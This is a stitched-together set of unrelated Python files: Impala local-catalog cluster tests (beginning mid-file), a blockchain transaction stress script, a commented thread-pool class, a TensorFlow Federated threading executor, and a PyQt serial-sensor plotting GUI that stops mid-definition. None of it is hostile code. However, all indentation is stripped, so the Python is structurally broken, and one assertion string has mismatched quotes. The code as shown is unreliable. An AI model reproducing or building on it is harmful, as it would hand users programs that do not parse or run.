# Trigger a query on all partitions so partitions with id=3,4,5 are loaded in local
# catalog cache.
self.execute_query("select count(*) from my_part")
# Update all partitions. We should receive invalidations for partition id=3,4,5.
# The new partitions are using id=6,7,8.
self.execute_query(
"insert overwrite my_part partition(p) values (0,0),(1,1),(2,2)")
self.assert_impalad_log_contains('INFO', log_regex % 3)
self.assert_impalad_log_contains('INFO', log_regex % 4)
self.assert_impalad_log_contains('INFO', log_regex % 5)
# Repeat the same test on non-partitioned tables
self.execute_query("create table my_tbl (id int)")
# Trigger a query to load the only partition which has partition id = 9.
self.execute_query("select count(*) from my_tbl")
# Update the table. So we should receive an invalidation on partition id = 9.
self.execute_query("insert into my_tbl select 0")
self.assert_impalad_log_contains(
'INFO', "Invalidated objects in cache: \[partition %s.my_tbl: \(id=9\)\]"
% unique_database)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_global_invalidate_metadata_with_sync_ddl(self, unique_database):
try:
impalad1 = self.cluster.impalads[0]
impalad2 = self.cluster.impalads[1]
client1 = impalad1.service.create_beeswax_client()
client2 = impalad2.service.create_beeswax_client()
# Create something to make the cache not empty.
self.execute_query_expect_success(
client1, "CREATE TABLE %s.my_tbl (i int)" % unique_database)
self.execute_query_expect_success(
client1, "CREATE FUNCTION %s.my_func LOCATION '%s/impala-hive-udfs.jar' "
"SYMBOL='org.apache.impala.TestUdf'" % (unique_database, WAREHOUSE))
self.execute_query_expect_success(
client1, "select * from functional.alltypestiny")
version_lower_bound = impalad1.service.get_metric_value(
CATALOG_VERSION_LOWER_BOUND)
# Reset catalog with SYNC_DDL from client 2.
query_options = {"sync_ddl": 1}
self.execute_query_expect_success(client2, "INVALIDATE METADATA", query_options)
assert version_lower_bound < impalad1.service.get_metric_value(
CATALOG_VERSION_LOWER_BOUND)
version_lower_bound = impalad1.service.get_metric_value(
CATALOG_VERSION_LOWER_BOUND)
assert version_lower_bound == impalad2.service.get_metric_value(
CATALOG_VERSION_LOWER_BOUND)
finally:
client1.close()
client2.close()
class TestLocalCatalogRetries(CustomClusterTestSuite):
def _check_metadata_retries(self, queries):
"""
Runs 'queries' concurrently, recording any inconsistent metadata exceptions.
'queries' is a list of query strings. The queries are run by two threads,
each one selecting a random query to run in a loop.
"""
# Tracks number of inconsistent metadata exceptions.
inconsistent_seen = [0]
inconsistent_seen_lock = threading.Lock()
# Tracks query failures for all other reasons.
failed_queries = Queue.Queue()
try:
client1 = self.cluster.impalads[0].service.create_beeswax_client()
client2 = self.cluster.impalads[1].service.create_beeswax_client()
def stress_thread(client):
# Loops, picks a random query in each iteration, runs it,
# and looks for retries and InconsistentMetadataFetchExceptions.
attempt = 0
while inconsistent_seen[0] == 0 and attempt < 200:
q = random.choice(queries)
attempt += 1
try:
ret = self.execute_query_unchecked(client, q)
except Exception, e:
if 'InconsistentMetadataFetchException' in str(e):
with inconsistent_seen_lock:
inconsistent_seen[0] += 1
else:
failed_queries.put((q, str(e)))
threads = [threading.Thread(target=stress_thread, args=(c,))
for c in [client1, client2]]
for t in threads:
t.start()
for t in threads:
# When there are failures, they're observed quickly.
t.join(30)
assert failed_queries.empty(),\
"Failed query count non zero: %s" % list(failed_queries.queue)
finally:
client1.close()
client2.close()
return inconsistent_seen[0]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_fetch_metadata_retry(self):
"""
Tests that operations that fetch metadata (excluding those fetches needed for
query planning) retry when they hit an InconsistentMetadataFetchException.
"""
queries = [
"show column stats functional.alltypes",
"show table stats functional.alltypes",
"describe extended functional.alltypes",
"show tables in functional like 'all*'",
"show files in functional.alltypes",
"refresh functional.alltypes"]
seen = self._check_metadata_retries(queries)
assert seen == 0, "Saw inconsistent metadata"
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true --local_catalog_max_fetch_retries=0",
catalogd_args="--catalog_topic_mode=minimal")
def test_replan_limit(self):
"""
Tests that the flag to limit the number of retries works and that
an inconsistent metadata exception when running concurrent reads/writes
is seen. With the max retries set to 0, no retries are expected and with
the concurrent read/write workload, an inconsistent metadata exception is
expected.
"""
queries = [
'refresh functional.alltypes',
'refresh functional.alltypes partition (year=2009, month=4)',
'select count(*) from functional.alltypes where month=4']
seen = self._check_metadata_retries(queries)
assert seen > 0, "Did not observe inconsistent metadata"
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_replan_on_stale_metadata(self, unique_database):
"""
Tests that when metadata is inconsistent while planning a query,
the query planner retries the query.
"""
try:
impalad1 = self.cluster.impalads[0]
impalad2 = self.cluster.impalads[1]
client1 = impalad1.service.create_beeswax_client()
client2 = impalad2.service.create_beeswax_client()
# Create a view in client 1, cache the table list including that view in
# client 2, and then drop it in client 1. While we've still cached the
# table list, try to describe the view from client 2 -- it should fail
# with the normal error message even though it had the inconsistent cache.
view = "%s.my_view" % unique_database
self.execute_query_expect_success(client1, "create view %s as select 1" % view)
self.execute_query_expect_success(client2, "show tables")
self.execute_query_expect_success(client1, "drop view %s" % view)
err = self.execute_query_expect_failure(client2, "describe %s" % view)
assert "Could not resolve path" in str(err)
# Run a mix of concurrent REFRESH and queries against different subsets
# of partitions. This causes partial views of the table to get cached,
# and then as the new partitions are loaded, we detect the version skew
# and issue re-plans. We run the concurrent workload until the profile
# indicates that a replan has happened.
# We expect stress_thread to cause a re-plan. The counter is stored in a
# mutable container so that stress_thread can update it.
# TODO: consolidate with _check_metadata_retries.
replans_seen = [0]
replans_seen_lock = threading.Lock()
# Queue to propagate exceptions from failed queries, if any.
failed_queries = Queue.Queue()
def stress_thread(client):
while replans_seen[0] == 0:
# TODO(todd) EXPLAIN queries don't currently yield a profile, so
# we have to actually run a COUNT query.
q = random.choice([
'invalidate metadata functional.alltypes',
'select count(*) from functional.alltypes where month=4',
'select count(*) from functional.alltypes where month=5'])
try:
ret = self.execute_query_expect_success(client, q)
except Exception as e:
failed_queries.put((q, str(e)))
continue
if RETRY_PROFILE_MSG in ret.runtime_profile:
with replans_seen_lock:
replans_seen[0] += 1
threads = [threading.Thread(target=stress_thread, args=(c,))
for c in [client1, client2]]
for t in threads:
t.start()
for t in threads:
t.join(30)
assert failed_queries.empty(), "Failed queries encountered: %s" %\
list(failed_queries.queue)
assert replans_seen[0] > 0, "Did not trigger any re-plans"
finally:
client1.close()
client2.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true --inject_latency_after_catalog_fetch_ms=50",
catalogd_args="--catalog_topic_mode=minimal",
cluster_size=1)
def test_invalidation_races(self, unique_database):
"""
Regression test for IMPALA-7534: races where invalidation of the table list
could be skipped, causing spurious "table not found" errors.
"""
test_self = self
class ThreadLocalClient(threading.local):
def __init__(self):
self.c = test_self.create_impala_client()
t = ThreadPool(processes=8)
tls = ThreadLocalClient()
def do_table(i):
for q in [
"create table {db}.t{i} (i int)",
"describe {db}.t{i}",
"drop table {db}.t{i}",
"create database {db}_{i}",
"show tables in {db}_{i}",
"drop database {db}_{i}"]:
self.execute_query_expect_success(tls.c, q.format(
db=unique_database, i=i))
# Prior to fixing IMPALA-7534, this test would fail within 20-30 iterations,
# so 100 should be quite reliable as a regression test.
NUM_ITERS = 100
for i in t.imap_unordered(do_table, xrange(NUM_ITERS)):
pass
class TestObservability(CustomClusterTestSuite):
def get_catalog_cache_metrics(self, impalad):
""" Returns catalog cache metrics as a dict by scraping the json metrics page on the
given impalad"""
child_groups =\
impalad.service.get_debug_webpage_json('metrics')['metric_group']['child_groups']
for group in child_groups:
if group['name'] != 'impala-server': continue
# Filter catalog cache metrics.
for child_group in group['child_groups']:
if child_group['name'] != 'catalog': continue
metrics_data = [(metric['name'], metric['value'])
for metric in child_group['metrics'] if 'catalog.cache' in metric['name']]
return dict(metrics_data)
assert False, "Catalog cache metrics not found in %s" % child_groups
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_cache_metrics(self, unique_database):
"""
Test that profile output includes impalad local cache metrics. Also verifies that
the daemon level metrics are updated between query runs.
"""
try:
impalad = self.cluster.impalads[0]
# Make sure local catalog mode is enabled and visible on web UI.
assert '(Local Catalog Mode)' in impalad.service.read_debug_webpage('/')
# Make sure /catalog_object endpoint is disabled on web UI.
assert 'No URI handler for '/catalog_object'' \
in impalad.service.read_debug_webpage('/catalog_object')
client = impalad.service.create_beeswax_client()
cache_hit_rate_metric_key = "catalog.cache.hit-rate"
cache_miss_rate_metric_key = "catalog.cache.miss-rate"
cache_hit_count_metric_key = "catalog.cache.hit-count"
cache_request_count_metric_key = "catalog.cache.request-count"
cache_request_count_prev_run = 0
cache_hit_count_prev_run = 0
test_table_name = "%s.test_cache_metrics_test_tbl" % unique_database
# A mix of queries of various types.
queries_to_test = ["select count(*) from functional.alltypes",
"explain select count(*) from functional.alltypes",
"create table %s (a int)" % test_table_name,
"drop table %s" % test_table_name]
for _ in xrange(0, 10):
for query in queries_to_test:
ret = self.execute_query_expect_success(client, query)
assert ret.runtime_profile.count("Frontend:") == 1
assert ret.runtime_profile.count("CatalogFetch") > 1
cache_metrics = self.get_catalog_cache_metrics(impalad)
cache_hit_rate = cache_metrics[cache_hit_rate_metric_key]
cache_miss_rate = cache_metrics[cache_miss_rate_metric_key]
cache_hit_count = cache_metrics[cache_hit_count_metric_key]
cache_request_count = cache_metrics[cache_request_count_metric_key]
assert cache_hit_rate > 0.0 and cache_hit_rate < 1.0
assert cache_miss_rate > 0.0 and cache_miss_rate < 1.0
assert cache_hit_count > cache_hit_count_prev_run,\
"%s not updated between two query runs, query - %s"\
% (cache_hit_count_metric_key, query)
assert cache_request_count > cache_request_count_prev_run,\
"%s not updated betweeen two query runs, query - %s"\
% (cache_request_count_metric_key, query)
cache_hit_count_prev_run = cache_hit_count
cache_request_count_prev_run = cache_request_count
finally:
client.close()
class TestFullAcid(CustomClusterTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@SkipIfHive2.acid
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_full_acid_support(self):
"""IMPALA-9685: canary test for full acid support in local catalog"""
self.execute_query("show create table functional_orc_def.alltypestiny")
res = self.execute_query("select id from functional_orc_def.alltypestiny")
res.data.sort()
assert res.data == ['0', '1', '2', '3', '4', '5', '6', '7']
@SkipIfHive2.acid
@SkipIfS3.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
def test_full_acid_scans(self, vector, unique_database):
self.run_test_case('QueryTest/full-acid-scans', vector, use_db=unique_database)
class TestReusePartitionMetadata(CustomClusterTestSuite):
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_reuse_partition_meta(self, unique_database):
"""
Test that unchanged partition metadata can be shared across table versions.
"""
self.execute_query(
"create table %s.alltypes like functional.alltypes" % unique_database)
self.execute_query("insert into %s.alltypes partition(year, month) "
"select * from functional.alltypes" % unique_database)
# Make sure the table is unloaded either in catalogd or coordinator.
self.execute_query("invalidate metadata %s.alltypes" % unique_database)
# First time: misses all(24) partitions.
self.check_missing_partitions(unique_database, 24)
# Second time: hits all(24) partitions.
self.check_missing_partitions(unique_database, 0)
# Alter comment on the table. Partition metadata should be reusable.
self.execute_query(
"comment on table %s.alltypes is null" % unique_database)
self.check_missing_partitions(unique_database, 0)
# Refresh one partition. Although table version bumps, metadata cache of other
# partitions should be reusable.
self.execute_query(
"refresh %s.alltypes partition(year=2009, month=1)" % unique_database)
self.check_missing_partitions(unique_database, 1)
# Drop one partition. Although table version bumps, metadata cache of existing
# partitions should be reusable.
self.execute_query(
"alter table %s.alltypes drop partition(year=2009, month=1)" % unique_database)
self.check_missing_partitions(unique_database, 0)
# Add back one partition. The partition meta is loaded in catalogd but not the
# coordinator. So we still miss its meta. For other partitions, we can reuse them.
self.execute_query(
"insert into %s.alltypes partition(year=2009, month=1) "
"select 0,true,0,0,0,0,0,0,'a','a',NULL" % unique_database)
self.check_missing_partitions(unique_database, 1)
def check_missing_partitions(self, unique_database, partition_misses):
"""Helper method for checking number of missing partitions while selecting
all partitions of the alltypes table"""
ret = self.execute_query_expect_success(
self.client, "explain select count(*) from %s.alltypes" % unique_database)
match = re.search(r"CatalogFetch.Partitions.Misses: (\d+)", ret.runtime_profile)
assert len(match.groups()) == 1
assert match.group(1) == str(partition_misses)
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, ETAio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, ETAio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, ETAio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="ETAio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission ETAio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
ThreadPool.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import queue
import threading
import contextlib
import time
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num):
self.q = queue.Queue()#存放任务的队列
self.max_num = max_num#最大线程并发数
self.terminal = False#如果为True 终止所有线程,不再获取新任务
self.generate_list = [] #已经创建的线程
self.free_list = []#闲置的线程
# self.run_sum_time=0
def run(self, func, args, callback=None):
"""
线程池执行一个任务
:param func: 任务函数
:param args: 任务函数所需参数
:param callback: 任务执行失败或成功后执行的回调函数,回调函数有两个参数1、任务函数执行状态;2、任务函数返回值(默认为None,即:不执行回调函数)
:return: 如果线程池已经终止,则返回True否则None
"""
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num: #无空闲线程和不超过最大线程数
self.generate_thread() # 创建线程
w = (func, args, callback,)#保存参数为元组
self.q.put(w)#添加到任务队列
# self.run_sum_time+=1
def generate_thread(self):
"""
创建一个线程
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
循环去获取任务函数并执行任务函数
"""
current_thread = threading.currentThread#获取当前线程对象
self.generate_list.append(current_thread)#添加到已创建线程里
event = self.q.get() #获取任务
while event != StopEvent: #如果不为停止信号
func, arguments, callback = event#分别取值,
try:
result = func(*arguments) #运行函数,把结果赋值给result
status = True #运行结果是否正常
except Exception as e:
status = False #不正常
result = e #结果为错误信息
# print(e)
if callback is not None: # 是否有回调函数
try:
callback(status, result) #执行回调函数
except Exception as e:
print("回调函数出错:"+str(e))
if self.terminal: # 默认为False ,如果调用terminal方法
event = StopEvent #停止信号
else:
# self.free_list.append(current_thread) #执行完毕任务,添加到闲置列表
# event = self.q.get() #获取任务
# self.free_list.remove(current_thread) #获取到任务之后,从闲置里删除
with self.worker_state(self.free_list,current_thread):
event = self.q.get()
else:
self.generate_list.remove(current_thread) #如果收到终止信号,就从已创建的列表删除
def close(self): #终止线程
num = len(self.generate_list) #获取总已创建的线程
while num:
self.q.put(StopEvent) #添加停止信号,有几个线程就添加几个
num -= 1
# 终止线程(清空队列)
def terminate(self):
self.terminal = True #更改为True,
while self.generate_list: #如果有已创建线程存活
self.q.put(StopEvent) #有几个就发几个信号
self.q.empty() #清空队列
@contextlib.contextmanager
def worker_state(self,free_list,current_thread):
free_list.append(current_thread)
try:
yield
finally:
free_list.remove(current_thread)
|
thread_delegating_executor.py
|
# Lint as: python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A concurrent executor that does work asynchronously in multiple threads."""
import asyncio
import functools
import threading
import weakref
import absl.logging as logging
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.impl.executors import executor_base
class ThreadDelegatingExecutor(executor_base.Executor):
"""The concurrent executor delegates work to a separate thread.
This executor only handles threading. It delegates all execution to an
underlying pool of target executors.
"""
# TODO(b/134543154): Upgrade this to a threadpool with multiple workers,
# possibly one that could be shared among multiple of these executors.
def __init__(self, target_executor):
"""Creates a concurrent executor backed by a target executor.
Args:
target_executor: The executor that does all the work.
"""
py_typecheck.check_type(target_executor, executor_base.Executor)
self._target_executor = target_executor
self._event_loop = asyncio.new_event_loop()
self._event_loop.set_task_factory(
tracing.propagate_trace_context_task_factory)
def run_loop(loop):
loop.run_forever()
loop.close()
self._thread = threading.Thread(
target=functools.partial(run_loop, self._event_loop), daemon=True)
self._thread.start()
def finalizer(loop, thread):
logging.debug('Finalizing, joining thread.')
loop.call_soon_threadsafe(loop.stop)
thread.join()
logging.debug('Thread joined.')
weakref.finalize(self, finalizer, self._event_loop, self._thread)
def close(self):
# Close does not clean up the event loop or thread.
# Using the executor again after cleanup used to lazily re-initialized the
# event loop, but this resulted in bugs related to the persistence of values
# associated with the old event loop ("futures are tied to different event
# loops"). See the closed bug b/148288711 for more information.
self._target_executor.close()
def _delegate(self, coro):
return asyncio.wrap_future(
tracing.run_coroutine_threadsafe_in_task_trace_context(
coro, self._event_loop))
@tracing.trace
async def create_value(self, value, type_spec=None):
return await self._delegate(
self._target_executor.create_value(value, type_spec))
@tracing.trace
async def create_call(self, comp, arg=None):
return await self._delegate(self._target_executor.create_call(comp, arg))
@tracing.trace
async def create_tuple(self, elements):
return await self._delegate(self._target_executor.create_tuple(elements))
@tracing.trace
async def create_selection(self, source, index=None, name=None):
return await self._delegate(
self._target_executor.create_selection(source, index=index, name=name))
|
pinchsensor_3_20180213.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
import pyqtgraph as pg
import time
import datetime
import serial
import numpy as np
import threading
import os
import configparser
default_time = 5 # 3 <= default_time <= 20
default_ymin = 2.0
default_ymax = 3.5
default_port = 'COM3'
default_baudrate = 2000000
config = configparser.ConfigParser()
if config.read('ps_config.ini'):
default_time = int(config['DEFAULT']['default_time'])
default_ymin = float(config['DEFAULT']['default_ymin'])
default_ymax = float(config['DEFAULT']['default_ymax'])
default_port = str(config['DEFAULT']['default_port'])
default_baudrate = int(config['DEFAULT']['default_baudrate'])
sample_size = default_time * 164 # 164 samples ~= 1 sec on plot
time_buffer = []
voltage_buffer = []
trigger_buffer = []
full_recordings = []
last_triggers = []
date = str(datetime.datetime.now())
ser = serial.Serial(timeout=3000)
ser.baudrate = default_baudrate
ser.port = default_port
stop_plot = True
testing = 0
# 0 -> not testing
# 1 -> test start
# 2 -> test running
# 3 -> test stop
rescaleX = False
current_recording = 0
current_test = 0
timeout_count = 0
timeout_limit = 50
def write_serial(command):
global stop_plot
try:
if command == "start_plot":
command_string = 'p' * 50
ser.write(command_string.encode())
ser.flushInput()
threading.Thread(target=get_data).start()
if command == "on/stop_plot":
command_string = 's' * 50
ser.write(command_string.encode())
except (OSError, serial.SerialException):
stop_plot = True
ui.message_box("communication_error", '')
def com_ports():
result = []
ports = ['COM%s' % (i + 1) for i in range(256)]
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def get_data():
global sample_size, stop_plot, time_buffer, voltage_buffer, current_recording, trigger_buffer
global testing, rescaleX, timeout_count
full_recordings.append([])
full_recordings[current_recording].extend(([], [], [], [], False))
full_recordings[current_recording][3].append(str(datetime.datetime.now()))
voltage_buffer = [0 for x in range(sample_size)]
time_buffer = [0 for x in range(sample_size)]
trigger_buffer = [0 for x in range(sample_size)]
while 1:
if stop_plot:
current_recording += 1
break
try:
val = ser.readline()
timeout_count = 0
val = val[:-2].decode('utf-8').split(',')
if len(val) == 3 and val[0] and val[1] and val[2]:
if len(voltage_buffer) > sample_size:
for i in range(len(voltage_buffer)-sample_size):
voltage_buffer.pop(0)
time_buffer.pop(0)
trigger_buffer.pop(0)
rescaleX = True
time_sample = int(val[0]) / 1000.
voltage_sample = int(val[1]) * 5. / 1023.
trigger_sample = int(val[2])
if trigger_sample:
if testing == 0:
testing = 1
else:
if testing == 2:
testing = 3
time_buffer.append(time_sample)
voltage_buffer.append(voltage_sample)
trigger_buffer.append(trigger_sample)
full_recordings[current_recording][0].append(time_sample)
full_recordings[current_recording][1].append(voltage_sample)
full_recordings[current_recording][2].append(trigger_sample)
except (OSError, serial.SerialException):
timeout_count += 1
if timeout_count >= timeout_limit:
stop_plot = True
ui.sudden_disconnect.signal.emit()
class Ui_pinchSensorUI(object):
def __init__(self, parent=None):
super(Ui_pinchSensorUI, self).__init__()
pinchSensorUI.setObjectName("pinchSensorUI")
pinchSensorUI.setFixedSize(1060, 660)
pinchSensorUI.setWindowFlags(QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowCloseButtonHint)
pinchSensorUI.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
pinchSensorUI.setWindowFilePath("")
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', '000')
self.sudden_disconnect = SuddenDisconnect()
self.sudden_disconnect.signal.connect(lambda: self.message_box("communication_error", ''))
# Main Window
self.centralWidget = QtWidgets.QStackedWidget()
self.centralWidget.setFrameRect(QtCore.QRect(0, 0, 450, 475))
self.centralWidget.setObjectName("centralWidget")
self.graph_widget = GraphWidget(self)
self.graph_widget.plotView.setYRange(default_ymin, default_ymax)
self.graph_widget.plotView.setLimits(xMin=0, minXRange=1.1*default_time,
maxXRange=1.1*default_time)
self.graph_widget.plotView.setInteractive(False)
self.plotItem = self.graph_widget.plotView.getPlotItem()
self.plotItem.hideButtons()
self.centralWidget.addWidget(self.graph_widget)
self.buttonPlot = QtWidgets.QPushButton(self.centralWidget)
self.buttonPlot.setGeometry(QtCore.QRect(880, 40, 161, 71))
self.buttonPlot.setObjectName("buttonPlot")
self.buttonPlot.setDisabled(True)
self.buttonSaveCurrent = QtWidgets.QPushButton(self.centralWidget)
self.buttonSaveCurrent.setEnabled(False)
self.buttonSaveCurrent.setGeometry(QtCore.QRect(880, 480, 161, 31))
self.buttonSaveCurrent.setObjectName("buttonSaveCurrent")
self.buttonSaveCurrent.clicked.connect(self.file_save_current)
self.buttonSaveAll = QtWidgets.QPushButton(self.centralWidget)
self.buttonSaveAll.setEnabled(False)
self.buttonSaveAll.setGeometry(QtCore.QRect(880, 550, 161, 31))
self.buttonSaveAll.setObjectName("buttonSaveAll")
self.buttonSaveAll.clicked.connect(self.file_save_all)
self.labelYUpper = QtWidgets.QLabel(self.centralWidget)
self.labelYUpper.setGeometry(QtCore.QRect(960, 140, 71, 21))
self.labelYUpper.setObjectName("labelYUpper")
self.labelYLower = QtWidgets.QLabel(self.centralWidget)
self.labelYLower.setGeometry(QtCore.QRect(960, 170, 71, 21))
self.labelYLower.setObjectName("labelYLower")
self.labelAdjustYAxis = QtWidgets.QLabel(self.centralWidget)
self.labelAdjustYAxis.setGeometry(QtCore.QRect(930, 120, 71, 16))
self.labelAdjustYAxis.setObjectName("labelAdjustYAxis")
self.spinYUpper = QtWidgets.QDoubleSpinBox(self.centralWidget)
self.spinYUpper.setGeometry(QtCore.QRect(901, 140, 51, 22))
self.spinYUpper.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.spinYUpper.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue)
self.spinYUpper.setKeyboardTracking(True)
self.spinYUpper.setProperty("showGroupSeparator", False)
self.spinYUpper.setDecimals(2)
self.spinYUpper.setMinimum(0.0)
self.spinYUpper.setMaximum(5.0)
self.spinYUpper.setSingleStep(0.25)
self.spinYUpper.setProperty("value", default_ymax)
self.spinYUpper.setObjectName("spinYUpper")
self.spinYLower = QtWidgets.QDoubleSpinBox(self.centralWidget)
self.spinYLower.setGeometry(QtCore.QRect(901, 170, 51, 22))
self.spinYLower.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.spinYLower.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue)
self.spinYLower.setDecimals(2)
self.spinYLower.setMaximum(5.0)
self.spinYLower.setSingleStep(0.25)
self.spinYLower.setProperty("value", default_ymin)
self.spinYLower.setObjectName("spinYLower")
self.spinX = QtWidgets.QSpinBox(self.centralWidget)
self.spinX.setGeometry(QtCore.QRect(900, 200, 51, 22))
self.spinX.setValue(default_time)
self.spinX.setMinimum(3)
self.spinX.setMaximum(20)
self.labelX = QtWidgets.QLabel(self.centralWidget)
self.labelX.setGeometry(QtCore.QRect(958, 200, 72, 21))
self.labelX.setText("Time Range (X)")
self.lcdCurrentSession = QtWidgets.QLCDNumber(self.centralWidget)
self.lcdCurrentSession.setGeometry(QtCore.QRect(1010, 450, 31, 23))
self.lcdCurrentSession.setDigitCount(3)
self.lcdCurrentSession.setFrameStyle(0)
self.lcdCurrentSession.setSegmentStyle(QtWidgets.QLCDNumber.Flat)
self.lcdCurrentSession.setObjectName("lcdCurrentSession")
self.lcdCurrentSession.display('00')
self.labelCurrentSession = QtWidgets.QLabel(self.centralWidget)
self.labelCurrentSession.setGeometry(QtCore.QRect(930, 455, 91, 16))
self.labelCurrentSession.setObjectName("labelCurrentSession")
self.lineFileName = LineEdit(self.centralWidget)
self.lineFileName.setGeometry(QtCore.QRect(880, 520, 161, 20))
self.lineFileName.setObjectName("lineFileName")
self.lineFileName.setText("pinchsensor_recording.txt")
self.lineFileName.textChanged.connect(self.update_file_name)
self.labelFileNameFirst = QtWidgets.QLabel(self.centralWidget)
self.labelFileNameFirst.setGeometry(QtCore.QRect(880, 590, 161, 16))
self.labelFileNameFirst.setText("pinchsensor_recording_1.txt")
self.menuBar = QtWidgets.QMenuBar(pinchSensorUI)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 1056, 21))
self.menuBar.setObjectName("menuBar")
self.labelTestTimes = QtWidgets.QLabel(self.centralWidget)
self.labelTestTimes.setGeometry(QtCore.QRect(875, 230, 171, 16))
self.labelTestTimes.setText("Tests performed (current session):")
self.treeTestTimes = QtWidgets.QTreeWidget(self.centralWidget)
self.treeTestTimes.setGeometry(QtCore.QRect(875, 250, 171, 191))
self.treeTestTimes.headerItem().setText(0, "#")
self.treeTestTimes.headerItem().setText(1, "Start")
self.treeTestTimes.headerItem().setText(2, "Finish")
self.treeTestTimes.headerItem().setText(3, "Elapsed")
self.treeTestTimes.header().resizeSection(0, 20)
self.treeTestTimes.header().resizeSection(1, 45)
self.treeTestTimes.header().resizeSection(2, 45)
self.treeTestTimes.header().resizeSection(3, 40)
self.treeTestTimes.setRootIsDecorated(False)
self.lcdTime = QtWidgets.QLCDNumber(self.centralWidget)
self.lcdTime.setSegmentStyle(QtWidgets.QLCDNumber.Flat)
self.lcdTime.setFrameStyle(0)
self.lcdTime.setDigitCount(5)
self.lcdTime.setGeometry(QtCore.QRect(770, 10, 120, 23))
self.buttonConnect = QtWidgets.QPushButton(self.centralWidget)
